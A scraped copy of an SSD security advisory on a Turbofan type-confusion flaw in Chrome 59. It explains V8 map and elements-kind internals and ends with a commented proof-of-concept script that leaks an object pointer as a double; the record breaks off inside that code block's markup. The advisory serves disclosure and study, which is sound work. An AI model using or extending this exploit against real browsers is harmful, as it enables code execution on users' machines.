{"id":8775,"date":"2017-08-16T14:19:05","date_gmt":"2017-08-16T22:19:05","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/16\/news-2548\/"},"modified":"2017-08-16T14:19:05","modified_gmt":"2017-08-16T22:19:05","slug":"news-2548","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/16\/news-2548\/","title":{"rendered":"SSD Advisory \u2013 Chrome Turbofan Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 16 Aug 2017 07:21:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3379\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3379');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a type confusion vulnerability that leads to remote code execution found in Chrome browser version 59.<\/p>\n<p>Chrome browser is affected by a type confusion vulnerability. The vulnerability results from incorrect optimization by the turbofan compiler, which causes confusion between access to an object array and a value array, and therefore allows to access objects as if they were values by reading them as if they were values (thus receiving their in memory address) or vice-versa to write values into an object array and thus being able to fake objects completely. <\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Google was informed of the vulnerability, and a ticket has been opened: <a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=746946\" target=\"_blank\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=746946<\/a>, because the vulnerability stopped working in Chrome 60 &#8211; Google has no plan to address it as a security advisory\/patch.<\/p>\n<p><span id=\"more-3379\"><\/span><\/p>\n<p><u><strong>Vulnerability details<\/strong><\/u><\/p>\n<p><strong>Background<\/strong><\/p>\n<p><u>Object maps<\/u><\/p>\n<p>Every object has a map representing the object\u2019s structure (keys and types of values). Two objects of the same structure (but with different values) will have the same map. The most common representation of an object is as follows:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE.png\" data-slb-active=\"1\" data-slb-asset=\"1325411320\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE-300x209.png\" alt=\"\" width=\"300\" height=\"209\" class=\"alignnone size-medium wp-image-3380\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE-300x209.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE.png 748w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Where the map field (a pointer to a map) holds the objects map. The two fixed arrays hold extra named properties and numbered properties respectively. The numbered properties are commonly named \u201cElements\u201d.<\/p>\n<p><u>Map transitions<\/u><br \/> When we add a new property to an object, the object\u2019s map is now invalid. A new map is created to fit the new structure, and a transition descriptor is added to the original map to show how to change it into the new map. <\/p>\n<p>For example:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d82668d623185845\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Var obj = {}; \/\/ Map M0 is created and assigned to the object  obj.x = 1; \/\/ Map M1 created, shows where to store the value x. A transition \u201cx\u201d is added to M0 with target M1.  obj.y=1; \/\/ Map M2 created, shows where to store the value y. A transition \u201cy\u201d is added to M1 with target M2.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>These transitions can later be used by the compiler to re-optimize functions when an inline cache miss occurs.<\/p>\n<p><u>Elements kind<\/u><br \/> The elements of an object are, as stated above, the values for numbered keys. These are stored in a regular array pointed to from the object. The object\u2019s map has a special bitfield called <em>ElementsKind<\/em>. This field describes whether the values in the elements array are <em>boxed<\/em>, <em>unboxed<\/em>, <em>contiguous<\/em>, <em>sparse<\/em>, etc. Maps that only differ by the elements kind are not connected by a transition.<\/p>\n<p><u>V8 arrays<\/u><br \/> Arrays in v8 are typed, and can have either \u201cboxed\u201d or \u201cunboxed\u201d values. This basically determines whether the array only holds doubles (integers are also represented as doubles), and therefore can hold the values directly (usually called \u201cfast\u201d arrays), or the array also holds more complex values, in which case the values will in fact be pointers to objects.<\/p>\n<p>A simplified representation of the two cases:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array.jpg\" data-slb-active=\"1\" data-slb-asset=\"1168391657\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array-300x83.jpg\" alt=\"\" width=\"300\" height=\"83\" class=\"alignnone size-medium wp-image-3381\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array-300x83.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array-768x212.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array-1024x283.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array.jpg 1125w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>(The type of the array itself determines whether the values are boxed or unboxed).<\/p>\n<p>So, if we have a fast array such as the left above and then we assign a complex object (such as an array) to one of the slots, the whole array is turned to a boxed one, and all existing values are changed to boxed ones as well.<\/p>\n<p><u>V8 optimization<\/u><br \/> The V8 compiler first analyzes the javascript code to generate JIT compiled code with very loose assumptions on types using an inline cache. <\/p>\n<p>The following explanations are taken from Google\u2019s V8 documentation:<\/p>\n<p>\u201cV8 compiles JavaScript source code directly into machine code when it is first executed. There are no intermediate byte codes, no interpreter. Property access is handled by inline cache code that may be patched with other machine instructions as V8 executes&#8230;.\u201d<br \/> \u201c&#8230;V8 optimizes property access by predicting that this [the object&#8217;s] class will also be used for all future objects accessed in the same section of code and uses the information in the class to patch the inline cache code to use the hidden class. If V8 has predicted correctly the property&#8217;s value is assigned (or fetched) in a single operation. If the prediction is incorrect, V8 patches the code to remove the optimisation.\u201d<\/p>\n<p>So the compiler will only compile code that works for specific types. If the next time this code section (or function) executes the type does not match the one compiled, an \u201cinline cache miss\u201d will occur, causing the compiler to recompile the code.<\/p>\n<p>For example, assume we have a function <em>f<\/em> and two objects <em>o1<\/em> and <em>o2<\/em> as such:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d826699466089420\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> f(arg_obj) {  \treturn arg_obj.x;  }  var o1 = {\u201cx\u201d:1, \u201cy\u201d:2}  var o2 = {\u201cx\u201d:1, \u201ct\u201d:2} <\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d826699466089420-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d826699466089420-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d826699466089420-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d826699466089420-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d826699466089420-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d826699466089420-1\"><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">arg_obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d826699466089420-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arg_obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d826699466089420-3\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d826699466089420-4\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span>\u201c<span class=\"crayon-i\">x<\/span>\u201d<span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span>\u201c<span class=\"crayon-i\">y<\/span>\u201d<span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d826699466089420-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span>\u201c<span class=\"crayon-i\">x<\/span>\u201d<span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span>\u201c<span class=\"crayon-i\">t<\/span>\u201d<span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>Now if the function is first called with <em>o1<\/em>, the compiler will generate code like the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d82669c147608172\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (ecx holds the argument)  cmp [ecx + &lt;hidden class offset&gt;], &lt;cached o1 class&gt;  jne &lt;inline cache miss&gt; &#8211; this will execute compiler code  mov eax, [ecx + &lt;cached x offset&gt;]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d82669c147608172-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d82669c147608172-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d82669c147608172-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d82669c147608172-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d82669c147608172-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ecx <\/span><span class=\"crayon-e\">holds <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d82669c147608172-2\"><span class=\"crayon-i\">cmp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ecx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">hidden <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">cached <\/span><span class=\"crayon-e\">o1 <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d82669c147608172-3\"><span class=\"crayon-v\">jne<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">inline <\/span><span class=\"crayon-e\">cache <\/span><span class=\"crayon-v\">miss<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-e\">compiler <\/span><span class=\"crayon-e\">code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d82669c147608172-4\"><span class=\"crayon-e\">mov <\/span><span class=\"crayon-v\">eax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ecx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">cached<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>when the function is called again with <em>o2<\/em>, the cache miss occurs, and the function\u2019s JIT code will be changed by compiler code.<\/p>\n<p><strong>The vulnerability<\/strong><\/p>\n<p><u>Element kind transitions<\/u><\/p>\n<p>When a cache miss occurs and the compiler wants to re-optimize function code, the compiler uses both saved transitions and generates needed <em>ElementsKindTransitions<\/em> (transitions to a map that only differs by elements kind) on the fly (using the function <em>Map::FindElementsKindTransitionedMap<\/em>). The reason these are done on the fly is because they only require to change the <em>ElementsKind<\/em> bit field, and not completely change the map.<\/p>\n<p><u>Stable maps<\/u><br \/> Maps are marked stable when the code to access their elements is already optimized. <\/p>\n<p>The vulnerability occurs when the optimization compiler decides that a function is used enough and is worth \u201cReducing\u201d (trying to further optimize the code to, as it is called, reduce its size). The function <em>ReduceElementAccess<\/em> is called to reduce accesses to elements of an object. It in turn calls <em>ComputeElementAccessInfos<\/em>.<\/p>\n<p><em>ComputeElementAccessInfos<\/em> is also the function that searches for possible elements kind transitions that can help optimization. <\/p>\n<p>The problem is if such a transition will be generated and used from a stable map. The reason this is problematic is since if such a transition is used, it will only effect the current function, and other functions that use the same stable map will not take the elements kind transition into consideration.<\/p>\n<p>What happens is this: First, a function is reduced in a way that makes it change the elements kind of a stable map. Next, a second function is reduced in a way that simply stores \/ loads a property in the same stable map. Now, an object of that map is created. The first function is called with that object as the argument, and the elements kind is changed.<\/p>\n<p>The second function is called, and the inline cache does not miss (since, remember, an elements kind transition is not a regular transition into a different map type that would cause the cache to miss). <\/p>\n<p>Since the cache did not miss, the function stores\/loads properties as if the object\u2019s elements were still unboxed, <strong>so we get a read\/write into an array of object pointers<\/strong>.<\/p>\n<p>However, this was actually already addressed in a previous commit (https:\/\/chromium.googlesource.com\/v8\/v8\/+\/2d856544e5e3cb8abf99a30749b4bfe39c29886a) &#8211; \u201cEnsure source map is not stable if elements kind transitions are expected.\u201d<\/p>\n<p>What the compiler does is the following &#8211; When a cache miss occurs on the function, the compiler checks if the miss can be rectified using an elements kind transition. This is done in <em>KeyedStoreIC::StoreElementPolymorphicHandlers<\/em> and <em>KeyedLoadIC::LoadElementPolymorphicHandlers<\/em>. The diff caused by the commit shows that if the source map for the transition is stable, it is set to unstable (meaning optimized code is decompiled), to make sure that the transition will affect all functions using the map. <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1.png\" data-slb-active=\"1\" data-slb-asset=\"1390825914\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1-300x34.png\" alt=\"\" width=\"300\" height=\"34\" class=\"alignnone size-medium wp-image-3382\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1-300x34.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1-768x87.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1-1024x116.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>So the first time a function call needs to change the map\u2019s Elements Kind, <em>StoreElementPolymorphicHandlers<\/em> calls <em>FindElementsKindTransitionedMap<\/em>, finds an elements kind transition, and makes sure to set the source map as unstable, thus assuring that code using the map will be deoptimized and future code will not be optimized on it, making sure elements kind will be handled appropriately. <\/p>\n<p><strong>So, how do we get an elements kind transition from a stable map despite of the above?<\/strong><\/p>\n<p>Just before we explain this we have to explain what a deprecated map is. A deprecated map is a map that all objects of that map have been changed to a different map. This map is set to be unstable, deoptimized, and is removed from the transition tree (the transition to it is removed, as well as any transitions from it). \t<\/p>\n<p>Now, if we take a look at <em>ComputeElementAccessInfos<\/em> code, we can see that just before the call to <em>FindElementsKindTransitionedMap<\/em>, a call to <em>TryUpdate<\/em> is performed. <\/p>\n<p><em>Tryupdate<\/em> is a function that, upon receiving a deprecated map, attempts to find another map from the same \u201ctree\u201d (meaning coming from the same root map through the same transitions) that is not deprecated, and returns that if such a map exists. <\/p>\n<p>The original source map for the elements kind transition, set to unstable in <em>LoadElementPolymorphicHandlers<\/em> has become deprecated. <em>TryUpdate<\/em> finds another map, and switches to that one. But this map was never used in optimizing this function, so it was never set to unstable, and we again get an elements kind transition from a stable map.<\/p>\n<p>The source code actually has a debug check to make sure that a transition was not generated from a stable map (added at the same commit where maps are made unstable), but this obviously does not affect release versions:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2.png\" data-slb-active=\"1\" data-slb-asset=\"1140375998\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2-300x99.png\" alt=\"\" width=\"300\" height=\"99\" class=\"alignnone size-medium wp-image-3383\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2-300x99.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2.png 748w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong><u>Minimal Proof of Concept<\/u><\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d8266a2429298345\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;  \/\/ The function that will be optimized to change elements kind. Could be called the \u201cevil\u201d function.  function change_elements_kind(a){  \ta[0] = Array;  }   \/\/ The function that will be optimized to read values directly as unboxed (and will therefore read pointers as values). Could also be called the \u201cevil\u201d function.  function read_as_unboxed(){\t      return evil[0];  }    \/\/ First, we want to make the function compile. Call it.  change_elements_kind({});    \/\/ Construct a new object. Let\u2019s call it\u2019s map M0.  map_manipulator = new Array(1.0,2.3);   \/\/ We add the property \u2018x\u2019. M0 will now have an \u2018x\u2019 transition to the new one, M1.   map_manipulator.x = 7;  \/\/ Call the function with this object. A version of the function for this M1 will be compiled.  change_elements_kind(map_manipulator);    \/\/ Change the object\u2019s \u2018x\u2019 property type. The previous \u2018x\u2019 transition from M0 to M1 will be removed, and M1 will be deprecated. A new map, M2, with a new \u2018x\u2019 transition from M0 is generated.  map_manipulator.x = {};        \/\/ Generate the object we\u2019ll use for the vulnerability. Make sure it is of the M2 map.  evil = new Array(1.1,2.2);  evil.x = {};    x = new Array({});  \/\/ Optimize change_elements_kind.   \/\/ ReduceElementAccess will be called, and it will in turn call ComputeElementAccessInfos. In the code  \/\/ snippet below (same as before), we can see that the code runs through all the maps (Note: these are \/\/ maps that have already been used in this function and compiled), and tries to update each of them.  \/\/ When reaching M1, TryUpdate will see that it\u2019s deprecated and look for a suitable non-deprecated   \/\/ map, and will find M2, since it has the same properties. Therefore, an elements kind transition will be   \/\/ created from M2.  for(var i = 0;i&lt;0x50000;i++){      change_elements_kind(x);  }       \/\/ Optimize read_as_unboxed. Evil is currently an instance of the M2 map, so the function will be  \/\/ optimized for that, and for fast element access (evil only holds unboxed numbered properties).  for(var i = 0;i&lt;0x50000;i++){      read_as_unboxed();  }    \/\/ Trigger an elements kind change on evil. Since change_elements_kind was optimized with an  \/\/ elements kind transition, evil\u2019s map will only be changed to reflect the new elements kind.  change_elements_kind(evil);    \/\/ Call read_as_unboxed. It\u2019s still the same M2 so a cache miss does not occur, and the optimized   \/\/ version is executed. However, that version assumes that the values in the elements array are unboxed  \/\/ so the Array constructor pointer (stored at position 0 in change_elements_kind) will be returned as a  \/\/ double.  alert(read_as_unboxed());  &lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div 